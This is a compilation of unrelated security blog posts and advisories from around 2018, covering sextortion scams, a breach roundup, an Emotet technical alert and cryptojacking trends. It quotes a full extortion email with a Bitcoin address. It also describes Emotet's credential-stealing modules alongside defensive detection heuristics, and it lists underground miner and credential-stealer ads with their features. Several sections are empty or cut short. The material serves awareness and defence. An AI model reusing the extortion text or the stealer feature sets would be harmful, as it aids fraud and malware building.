When a device ends up being infected, it’s either because of hardware or software vulnerabilities. And while there are virus removal tools to clean up any infections, there still may be breadcrumbs of infection that can creep back in. It’s generally a good idea to reinstall the device’s operating system to completely clear out the infection and remove any residual malware.

As an added bonus, a reinstall will remove bloatware and speed up your device too.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of a cybersecurity speaking and consulting firm based in Massachusetts. See him discussing internet and wireless security on Good Morning America.

OVPN review: An ideal VPN except for one big drawback

OVPN in brief:

P2P allowed: Yes
Business location: Stockholm, Sweden
Number of servers: 56
Number of country locations: 7
Cost: $84 per year
VPN protocol: OpenVPN
Data encryption: AES-256-GCM
Data authentication: SHA1 HMAC
Handshake encryption: TLSv1.2

One of the big questions many people have about a VPN service is just how well they can trust a company’s no-logging claim. OVPN tries to allay that concern as much as possible by running its own small network of servers in seven countries.


“Here Be Dragons”, Keeping Kids Safe Online

Sitting here this morning sipping my coffee, I watched fascinated as my 5-year-old daughter set up a VPN connection on her iPad while munching on her breakfast out of absent-minded necessity.

It dawned on me that, while my daughter has managed to puzzle out how to route around geofencing issues that many adults can’t grasp, her safety online is never something to take for granted. I have encountered parents that allow their kids to access the Internet without controls beyond “don’t do X” — which we all know is as effective as holding up gauze in front of a semi and hoping for the best (hat tip to Robin Williams).

More parents need to be made aware that on the tubes of the Internet, “here be dragons.”

First and foremost for keeping your kids safe online is that you need to wrap your head around a poignant fact: iThingers and their ilk are NOT babysitters. Please get this clear in your mind. Yes, I have been known to use these as child suppression devices for long car rides but, we need to be honest with ourselves. Far too often they become surrogates and this needs to stop. When I was a kid my folks would plonk me down in front of the massive black and white television with faux wood finish so I could watch one of the three channels. To a large extent this became the forerunner of the modern digital iBabysitter.

These days I can’t walk into a restaurant without seeing some family engrossed in their respective devices oblivious of the world around them, let alone each other. Set boundaries for usage. Do not let these devices be a substitute parent or a distraction and be sure to regulate what is being done online for both you and your child.

I have had conversations with many parents about the best software to install on a system to monitor a child’s activity. Often that is a conversation borne out of fear of the unknown. Non-technical parents outnumber the technically savvy ones by an order of magnitude and we can’t forget this fact. There are numerous choices out there that you can install on your computer but, the software package that is frequently overlooked is common sense.

All kidding aside, there seems to be a tendency in modern society to offload and outsource responsibility. Kids are curious and they will click links and talk to folks online without the understanding that there are bad actors out there. It is incumbent upon us, the adults, to address that situation through education. Talk with your kids so that they understand what the issues are that they need to be aware of when they’re online. More importantly, if you as a parent aren’t aware of the dangers that are online you need to avail yourself of the information.

This is where programs such as (ISC)²’s “Safe and Secure Online” come in.

Protecting your children is your top priority and helping children protect themselves online is ours. The (ISC)² Safe and Secure Online (SSO) program brings cyber security experts into classrooms and to community groups like scouts or sports clubs at no charge to teach children ages 7-10 and 11-14 how to stay safe online. We also offer a parent presentation so that you may learn these vital tools as well.

This is by no means the only choice out there but, it is a good starting point. The Internet is a marvelous collection of information but, as with anything that is the product of a hive mind, there is a dark side. Parents and kids need to take the time to arm themselves with the education to help guard against the perils of the online world.

If you don’t know, ask. If you don’t ask, you’ll never know.

Originally posted on CSO Online by me.

The post “Here Be Dragons”, Keeping Kids Safe Online appeared first on Liquidmatrix Security Digest.

Scammers Use Breached Personal Details to Persuade Victims

Scammers use a variety of social engineering tactics when persuading victims to follow the desired course of action. One example of this approach involves including in the fraudulent message personal details about the recipient to “prove” that the victim is in the miscreant’s grip. In reality, the sender probably obtained the data from one of the many breaches that provide swindlers with an almost unlimited supply of personal information.

Personalized Porn Extortion Scam

Consider the case of an extortion scam in which the sender claims to have evidence of the victim’s pornography-viewing habits. The scammer demands payment in exchange for suppressing the “compromising evidence.” A variation of this technique was documented by Stu Sjouwerman at KnowBe4 in 2017. In a modern twist, the scammer includes personal details about the recipient—beyond merely the person’s name—such as the password the victim used:

“****** is one of your password and now I will directly come to the point. You do not know anything about me but I know alot about you and you must be thinking why are you getting this e mail, correct?

I actually setup malware on porn video clips (adult porn) & guess what, you visited same adult website to experience fun (you get my drift). And when you got busy enjoying those videos, your web browser started out operating as a RDP (Remote Desktop Protocol) that has a backdoor which provided me with accessibility to your screen and your web camera controls.”

The email includes a demand for payment via cryptocurrency such as Bitcoin to ensure that “Your naughty secret remains your secret.” The sender calls this “privacy fees.” Variations on this scheme are documented in the Blackmail Email Scam thread on Reddit.

The inclusion of the password that the victim used at some point in the past lends credibility to the sender’s claim that the scammer knows a lot about the recipient. In reality, the miscreant likely obtained the password from one of many data dumps that include email addresses, passwords, and other personal information stolen from breached websites.

Data Breach Lawsuit Scam

In another scenario, the scammer uses the knowledge of the victim’s phone number to “prove” possession of sensitive data. The sender poses as an entity that’s preparing to sue the company that allegedly leaked the data:

“Your data is compromised. We are preparing a lawsuit against the company that allowed a big data leak. If you want to join and find out what data was lost, please contact us via this email. If all our clients win a case, we plan to get a large amount of compensation and all the data and photos that were stolen from the company. We have all information to win. For example, we write to your email and include part your number ****** from a large leak.”

The miscreant’s likely objective is to solicit additional personal information from the victim under the guise of preparing the lawsuit, possibly requesting the social security number, banking account details, etc. The sender might have obtained the victim’s name, email address and phone number from a breached data dump, and is phishing for other, more lucrative data.

What to Do?

If you receive a message that solicits payment or confidential data under the guise of knowing some of your personal information, be skeptical. This is probably a mass-mailed scam and your best approach is usually to ignore the message. In addition, keep an eye on the breaches that might have compromised your data using the free and trusted service Have I Been Pwned by Troy Hunt, change your passwords when this site tells you they’ve been breached, and don’t reuse passwords across websites or apps.

Sometimes an extortion note is real and warrants a closer look and potentially law enforcement involvement. Only you know your situation and can decide on the best course of action. Fortunately, every example that I’ve had a chance to examine turned out to be a social engineering trick that recipients were best to ignore.

To better understand the persuasion tactics employed by online scammers, take a look at my earlier articles on this topic:


Free SANS Webinar: I Before R Except After IOC

Join Andrew Hay on Wednesday, July 25th, 2018 at 10:30 AM EDT (14:30:00 UTC) for an exciting free SANS Institute Webinar entitled “I” Before “R” Except After IOC. Using actual investigations and research, this session will help attendees better understand the true value of an individual IOC, how to quantify and utilize your collected indicators, and what constitutes an actual incident.

The security industry touts indicators of compromise (IOCs) as much-needed intelligence in the war on attackers, but the fact is that not every IOC is valuable enough to trigger an incident response (IR) activity. All too often the indicators we are provided contain information of varying quality, including expired attribution, dubious origin, and incomplete details. So how many IOCs are needed before you can confidently declare an incident? After this session, the attendee will:

  • Know how to quickly determine the value of an IOC,
  • Understand when more information is needed (and from what source), and
  • Make intelligent decisions on whether or not an incident should be declared.

Register to attend the webinar here:

Cyber Security Roundup for July 2018

The importance of assuring the security and testing quality of third-party applications was made more than evident this month by an NHS-reported data breach of 150,000 patient records. The NHS said the breach was caused by a coding error in a GP application called SystmOne, developed by the UK-based The Phoenix Partnership (TPP). The same assurance also applies to internally developed applications; a case in point was a publicly announced flaw in Thomas Cook's booking system discovered by a Norwegian security researcher. The researcher used the app flaw to access the names and flight details of Thomas Cook passengers and released the details on his blog. Thomas Cook said the issue has since been fixed.

Third-party services also need to be security assured, as seen with the Typeform compromise. Typeform is a data collection company; on 27th June, hackers gained unauthorised access to one of its servers and accessed customer data. In its official notification, Typeform said the hackers may have accessed data held in a partial backup, and that it had fixed a security vulnerability to prevent a recurrence. Typeform has not provided any details of the number of records compromised, but one of its customers, Monzo, said on its official blog that the number was in the region of 20,000. Interestingly, Monzo also declared it would end its relationship with Typeform unless the company wins back its trust. Travelodge is one UK company known to be impacted by the Typeform breach and has warned its affected customers; Typeform is used to manage Travelodge's customer surveys and competitions.

Other companies known to be impacted by the Typeform breach include:

The Information Commissioner's Office (ICO) fined Facebook £500,000, the maximum possible, over the Cambridge Analytica data breach scandal, which impacted some 87 million Facebook users. Fortunately for Facebook, the breach occurred before the General Data Protection Regulation came into force in May; the new GDPR empowers the ICO with much tougher financial penalties designed to bring tech giants to book. Let's be honest: £500k is petty cash for the social media giant.
Facebook-Cambridge Analytica data scandal
Facebook reveals its data-sharing VIPs
Cambridge Analytica boss spars with MPs

A UK government report criticised the security of Huawei products, concluding the government had "only limited assurance" that Huawei kit posed no threat to UK national security. I remember being concerned many years ago when I heard BT had ditched US Cisco routers for Huawei routers to save money; not much was said about the national security aspect at the time. The report was written by the Huawei Cyber Security Evaluation Centre (HCSEC), a body overseen by GCHQ that was set up in 2010 in response to concerns about BT's and other UK companies' reliance on the Chinese manufacturer's devices.

Banking hacking group "MoneyTaker" has struck again, this time stealing a reported £700,000 from a Russian bank, according to Group-IB. The group is thought to be behind several other hacking raids against UK, US, and Russian companies. The gang compromised a router which gave them access to the bank's internal network; from that entry point, they were able to find the specific system used to authorise cash transfers and then set up bogus transfers to cash out the £700K.


Porn Extortion Email tied to Password Breach

(An update to this post has been made at the end)

This weekend I received an email forwarded from a stranger.  They had received a threatening email and had shared it with a former student of mine to ask advice.  Fortunately, the correct advice in this case was "Ignore it."  But they still shared it with me in case we could use it to help others.

The email claims that the sender has planted malware on the recipient's computer and has observed them watching pornography online.   As evidence that they really have control of the computer, the email begins by sharing one of the recipient's former passwords.

They then threaten that they are going to release a video of the recipient, recorded from their webcam while they watched the pornography, unless they receive $1000 in Bitcoin. The good news, as my former student knew, was that this was almost certainly an empty threat. There have been dozens of variations on this scheme, but it is based on the concept that if someone knows your password, they COULD know much more about you. In this case, the password came from a data breach involving a gaming site where the recipient used to hang out online. So, if you think to yourself "This must be real, they know my password!" just remember that there have been HUNDREDS of data breaches where email addresses and their corresponding passwords have been leaked. (The website "Have I Been Pwned?" has collected over 500 million such email/password pair leaks. In full disclosure, my personal email is in their database TEN times and my work email is in their database SIX times, which doesn't concern me because I follow the proper password practice of using a different password on every site I visit. Sites including Adobe, which asks you to register before downloading software, and LinkedIn are among some of the giants who have had breaches that revealed passwords. One list circulating on the dark web has 1.4 BILLION userids and passwords gathered from at least 250 distinct data breaches.)

With that context in mind, even if you happen to be one of the millions of Americans who have watched porn online: DON'T PANIC! This email is definitely a fake, using knowledge of a breached password to try to convince you the sender has blackmail material on you.

We'll go ahead and share the exact text of the email, replacing only the password with the word YOURPASSWORDHERE.

YOURPASSWORDHERE is one of your passphrase. Lets get directly to the point. There is no one who has paid me to investigate you. You don't know me and you are most likely wondering why you are getting this mail?
In fact, I actually installed a malware on the X video clips (porn) web site and do you know what, you visited this site to experience fun (you know what I mean). When you were watching video clips, your browser initiated functioning as a RDP that has a key logger which provided me accessibility to your display screen and also cam. after that, my software obtained your entire contacts from your Messenger, Facebook, and email . After that I made a double-screen video. 1st part shows the video you were viewing (you've got a nice taste omg), and next part shows the view of your web cam, & its you. 
You have got not one but two alternatives. We will go through these choices in details:
First alternative is to neglect this email message. In such a case, I will send out your very own videotape to all of your contacts and also visualize about the embarrassment you will definitely get. And definitely if you happen to be in a romantic relationship, exactly how this will affect?
Latter solution is to compensate me $1000. Let us describe it as a donation. In such a case, I will asap delete your video. You can go forward your daily life like this never occurred and you surely will never hear back again from me.
You'll make the payment through Bitcoin (if you do not know this, search for "how to buy bitcoin" in Google). 
BTC Address: 192hBrF64LcTQUkQRmRAVgLRC5SQRCWshi[CASE sensitive so copy and paste it]
If you are thinking about going to the law, well, this email can not be traced back to me. I have taken care of my moves. I am not attempting to charge a fee a huge amount, I simply want to be rewarded. You have one day in order to pay. I have a specific pixel in this e-mail, and now I know that you have read through this mail. If I do not receive the BitCoins, I will definately send your video to all of your contacts including family members, co-workers, and so forth. Having said that, if I receive the payment, I'll destroy the video right away. If you really want proof, reply with Yes & I definitely will send out your video recording to your 5 friends. This is the non-negotiable offer and thus don't waste mine time & yours by responding to this message.
This particular scam was first seen in the wild back in December of 2017, though some similar versions predate it.  However, beginning in late May the scam kicked up in prevalence, and in the second week of July, apparently someone's botnet started sending this spam in SERIOUS volumes, as there have been more than a dozen news stories just in the past ten days about the scam.

Here's one such warning article from the Better Business Bureau's Scam Tracker.

One thing to mention is that the Bitcoin address lets us track whether payments have been made to the criminal.  It seems that this particular botnet is using a very large number of unique bitcoin addresses.  It would be extremely helpful to this investigation if you could share in the comments section what Bitcoin address (the "BTC Address") was seen in your copy of the spam email.
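Before recording a reported address, it can be worth confirming that it is at least a well-formed Bitcoin address. Legacy addresses use Base58Check encoding with a 4-byte checksum, which a short script can verify offline. This is an illustrative sketch (it checks syntax only, and says nothing about who controls the address); the known-valid genesis-block address is used as the example:

```python
# Hedged sketch: validate the Base58Check encoding of a legacy Bitcoin
# address. A valid address decodes to 25 bytes whose last 4 bytes equal
# the first 4 bytes of a double-SHA-256 of the preceding 21 bytes.
import hashlib

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def is_valid_btc_address(addr: str) -> bool:
    n = 0
    for ch in addr:
        if ch not in B58:
            return False  # character outside the Base58 alphabet
        n = n * 58 + B58.index(ch)
    if n.bit_length() > 200:  # legacy addresses decode to exactly 25 bytes
        return False
    payload = n.to_bytes(25, "big")  # restores any leading zero bytes
    checksum = hashlib.sha256(hashlib.sha256(payload[:-4]).digest()).digest()[:4]
    return checksum == payload[-4:]

# The Bitcoin genesis-block address is a well-known valid example:
print(is_valid_btc_address("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"))  # True
```

A mistyped or truncated address will almost always fail the checksum, which is exactly why the scam email warns recipients that the address is "CASE sensitive."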

As always, we encourage any victim of a cyber crime to report it to the FBI's Internet Crime Complaint Center (IC3) by visiting

Please feel free to share this note with your friends!
Thank you!


The excellent analysts at the SANS Internet Storm Center have also been gathering bitcoin addresses from victims.  In their sample so far, 17% of the Bitcoin addresses have received payments, totalling $235,000, so people truly are falling victim to this scam!

Please continue to share this post and encourage people to add their Bitcoin addresses as a comment below!

Defining Counterintelligence

I've written about counterintelligence (CI) before, but I realized today that some of my writing, and the writing of others, may be confused as to exactly what CI means.

The authoritative place to find an American definition for CI is the United States National Counterintelligence and Security Center. I am more familiar with the old name of this organization, the  Office of the National Counterintelligence Executive (ONCIX).

The 2016 National Counterintelligence Strategy cites Executive Order 12333 (as amended) for its definition of CI:

Counterintelligence – Information gathered and activities conducted to identify, deceive, exploit, disrupt, or protect against espionage, other intelligence activities, sabotage, or assassinations conducted for or on behalf of foreign powers, organizations, or persons, or their agents, or international terrorist organizations or activities. (emphasis added)

The strict interpretation of this definition is countering foreign nation state intelligence activities, such as those conducted by China's Ministry of State Security (MSS), the Foreign Intelligence Service of the Russian Federation (SVR RF), Iran's Ministry of Intelligence, or the military intelligence services of those countries and others.

In other words, counterintelligence is countering foreign intelligence. The focus is on the party doing the bad things, and less on what the bad thing is.

The definition, however, is loose enough to encompass others; "organizations," "persons," and "international terrorist organizations" are in scope, according to the definition. This is just about everyone, although criminals are explicitly not mentioned.

The definition is also slightly unbounded by moving beyond "espionage, or other intelligence activities," to include "sabotage, or assassinations." In those cases, the assumption is that foreign intelligence agencies and their proxies are the parties likely to be conducting sabotage or assassinations. In the course of their CI work, paying attention to foreign intelligence agents, the CI team may encounter plans for activities beyond collection.

The bottom line for this post is a cautionary message. It's not appropriate to call all intelligence activities "counterintelligence." It's more appropriate to call countering adversary intelligence activities counterintelligence.

You may use similar or the same approaches as counterintelligence agents when performing your cyber threat intelligence function. For example, you may recruit a source inside a carding forum, or you may plant your own source in a carding forum. This is similar to turning a foreign intelligence agent, or inserting your own agent into a foreign intelligence service. However, activities directed against a carding forum are not counterintelligence. Activities directed against a foreign intelligence service are counterintelligence.

The nature and target of your intelligence activities are what determine whether they are counterintelligence, not necessarily the methods you use. Again, this is in keeping with the stricter definition, and not becoming a victim of scope creep.

TA18-201A: Emotet Malware

Original release date: July 20, 2018

Systems Affected

Network Systems


Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors.

This joint Technical Alert (TA) is the result of Multi-State Information Sharing & Analysis Center (MS-ISAC) analytic efforts, in coordination with the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC).


Emotet continues to be among the most costly and destructive malware affecting SLTT governments. Its worm-like features result in rapidly spreading network-wide infections, which are difficult to combat. Emotet infections have cost SLTT governments up to $1 million per incident to remediate.

Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. It uses modular Dynamic Link Libraries (DLLs) to continuously evolve and update its capabilities. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment.

Emotet is disseminated through malspam (emails containing malicious attachments or links) that uses branding familiar to the recipient; it has even been spread using the MS-ISAC name. As of July 2018, the most recent campaigns imitate PayPal receipts, shipping notifications, or “past-due” invoices purportedly from MS-ISAC. Initial infection occurs when a user opens or clicks the malicious download link, PDF, or macro-enabled Microsoft Word document included in the malspam. Once downloaded, Emotet establishes persistence and attempts to propagate across local networks through incorporated spreader modules.

Figure 1: Malicious email distributing Emotet

Currently, Emotet uses five known spreader modules: NetPass.exe, WebBrowserPassView, Mail PassView, Outlook scraper, and a credential enumerator.

  1. NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives.
  2. Outlook scraper is a tool that scrapes names and email addresses from the victim’s Outlook accounts and uses that information to send out additional phishing emails from the compromised accounts.
  3. WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module.
  4. Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module.
  5. Credential enumerator is a self-extracting RAR file containing two components: a bypass component and a service component. The bypass component is used for the enumeration of network resources and either finds writable share drives using Server Message Block (SMB) or tries to brute force user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients).
Figure 2: Emotet infection process

To maintain persistence, Emotet injects code into explorer.exe and other running processes. It can also collect sensitive information, including system name, location, and operating system version, and connects to a remote command and control server (C2), usually through a generated 16-letter domain name that ends in “.eu.” Once Emotet establishes a connection with the C2, it reports a new infection, receives configuration data, downloads and runs files, receives instructions, and uploads data to the C2 server.
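As a rough illustration of the C2 indicator described above, and emphatically not Emotet's actual domain-generation logic, a defender might flag DNS queries whose name is a generated-looking 16-letter label under ".eu" (the sample domains below are made up for the example):

```python
# Hedged sketch: flag domains matching the generic pattern from the alert
# (a generated 16-letter lowercase label ending in ".eu"). Real detection
# needs far more context; this only illustrates the indicator.
import re

PATTERN = re.compile(r"^[a-z]{16}\.eu$")

def looks_like_emotet_c2(domain: str) -> bool:
    return bool(PATTERN.match(domain.lower()))

queries = ["abcdefghijklmnop.eu", "example.com", "mail.google.com"]
flagged = [q for q in queries if looks_like_emotet_c2(q)]
print(flagged)  # ['abcdefghijklmnop.eu']
```

On its own such a pattern would produce false positives on legitimate .eu domains, so it belongs in a scoring pipeline rather than a blocklist.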

Emotet artifacts are typically found in arbitrary paths located off of the AppData\Local and AppData\Roaming directories. The artifacts usually mimic the names of known executables. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services. When executed, these services attempt to propagate the malware to adjacent systems via accessible administrative shares.

Note: it is essential that privileged accounts are not used to log in to compromised systems during remediation as this may accelerate the spread of the malware.

Example Filenames and Paths:

C:\Users\<username>\AppData\Local\Microsoft\Windows\shedaudio.exe

C:\Users\<username>\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe
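A triage script can use the artifact locations above as a coarse filter: executables running out of AppData\Local or AppData\Roaming are worth a closer look. This is a heuristic sketch only (the username and second path below are made-up examples, not indicators from the alert):

```python
# Illustrative triage heuristic, assuming the artifact pattern described
# above: flag .exe files located under AppData\Local or AppData\Roaming.
# Not a complete or authoritative Emotet detector.
import re

APPDATA_EXE = re.compile(r"\\AppData\\(Local|Roaming)\\.*\.exe$", re.IGNORECASE)

def is_suspicious_path(path: str) -> bool:
    return bool(APPDATA_EXE.search(path))

examples = [
    r"C:\Users\alice\AppData\Local\Microsoft\Windows\shedaudio.exe",
    r"C:\Windows\System32\svchost.exe",
]
print([is_suspicious_path(p) for p in examples])  # [True, False]
```

Legitimate software does sometimes install under AppData, so hits from a check like this should feed an analyst queue, not an automated response.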

Typical Registry Keys:




System Root Directories:






Negative consequences of Emotet infection include

  • temporary or permanent loss of sensitive or proprietary information,
  • disruption to regular operations,
  • financial losses incurred to restore systems and files, and
  • potential harm to an organization’s reputation.


NCCIC and MS-ISAC recommend that organizations adhere to the following general best practices to limit the effect of Emotet and similar malspam:

  • Use Group Policy Object to set a Windows Firewall rule to restrict inbound SMB communication between client systems. If using an alternative host-based intrusion prevention system (HIPS), consider implementing custom modifications for the control of client-to-client SMB communication. At a minimum, create a Group Policy Object that restricts inbound SMB connections to clients originating from clients.
  • Use antivirus programs, with automatic updates of signatures and software, on clients and servers.
  • Apply appropriate patches and updates immediately (after appropriate testing).
  • Implement filters at the email gateway to filter out emails with known malspam indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall.
  • If your organization does not have a policy regarding suspicious emails, consider creating one and specifying that all suspicious emails should be reported to the security or IT department.
  • Mark external emails with a banner denoting that they come from an external source. This will assist users in detecting spoofed emails.
  • Provide employees training on social engineering and phishing. Urge employees not to open suspicious emails, click links contained in such emails, or post sensitive information online, and to never provide usernames, passwords, or personal information in answer to any unsolicited request. Educate users to hover over a link with their mouse to verify the destination prior to clicking on the link.
  • Consider blocking file attachments that are commonly associated with malware, such as .dll and .exe, and attachments that cannot be scanned by antivirus software, such as .zip files.
  • Adhere to the principle of least privilege, ensuring that users have the minimum level of access required to accomplish their duties. Limit administrative credentials to designated administrators.
  • Implement Domain-Based Message Authentication, Reporting & Conformance (DMARC), a validation system that minimizes spam emails by detecting email spoofing using Domain Name System (DNS) records and digital signatures.
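To illustrate the last recommendation: a DMARC policy is published as a DNS TXT record at the "_dmarc" subdomain of the sending domain. A minimal sketch, in which the domain, policy, and reporting mailbox are placeholder assumptions:

```
_dmarc.example.com.  IN  TXT  "v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com"
```

Here "p=quarantine" asks receivers to treat failing messages as suspicious, and "rua" names a mailbox for aggregate reports; many organizations start with "p=none" to monitor before enforcing.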

If a user or organization believes they may be infected, NCCIC and MS-ISAC recommend running an antivirus scan on the system and taking action to isolate the infected workstation based on the results. If multiple workstations are infected, the following actions are recommended:

  • Identify, shut down, and take the infected machines off the network;
  • Consider temporarily taking the network offline to perform identification, prevent reinfections, and stop the spread of the malware;
  • Do not log in to infected systems using domain or shared local administrator accounts;
  • Reimage the infected machine(s);
  • After reviewing systems for Emotet indicators, move clean systems to a containment virtual local area network that is segregated from the infected network;
  • Issue password resets for both domain and local credentials;
  • Because Emotet scrapes additional credentials, consider password resets for other applications that may have had stored credentials on the compromised machine(s);
  • Identify the infection source (patient zero); and
  • Review the log files and the Outlook mailbox rules associated with the infected user account to ensure further compromises have not occurred. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach.


MS-ISAC is the focal point for cyber threat prevention, protection, response, and recovery for the nation’s SLTT governments. More information about this topic, as well as 24/7 cybersecurity assistance for SLTT governments, is available by phone at 866-787-4722, by email at, or on MS-ISAC’s website at

To report an intrusion and request resources for incident response or technical assistance, contact NCCIC by email at or by phone at 888-282-0870.


Revision History

  • July 20, 2018: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners


Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.

Figure 1: The role of miners
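The hashing loop described above can be sketched in a few lines. This is a toy proof-of-work, assuming a simple leading-zeros difficulty rule rather than any real blockchain's target arithmetic or block format:

```python
# Toy proof-of-work sketch: find a nonce such that the block's SHA-256
# hash starts with a given number of zero hex digits. Real blockchains
# compare the hash against a numeric target, but the search loop is the
# same idea, and raising the difficulty makes it exponentially harder.
import hashlib

def mine(prev_hash: str, transactions: str, difficulty: int = 4) -> tuple[int, str]:
    nonce = 0
    while True:
        block = f"{prev_hash}|{transactions}|{nonce}".encode()
        digest = hashlib.sha256(block).hexdigest()
        if digest.startswith("0" * difficulty):
            return nonce, digest
        nonce += 1

nonce, digest = mine("0" * 64, "alice->bob:1.0", difficulty=4)
print(nonce, digest)
```

Each additional zero of difficulty multiplies the expected work by 16, which is why pooled CPU, GPU, or stolen (cryptojacked) compute matters so much to miners.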

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.

Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, forked from Bytecoin. Unlike many cryptocurrencies, Monero uses a technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique, single-use addresses that can only be associated with the payment recipient and are infeasible to reveal through blockchain analysis, ensuring that Monero transactions cannot be linked while remaining cryptographically secure.

The Monero blockchain also uses a "memory-hard" hashing algorithm called CryptoNight which, unlike Bitcoin's SHA-256 algorithm, deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers because it keeps CPU mining feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-source tools, many criminals rely on crypters: tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities











Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option

Figure 3: Monero Madness

Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram

Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel

Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

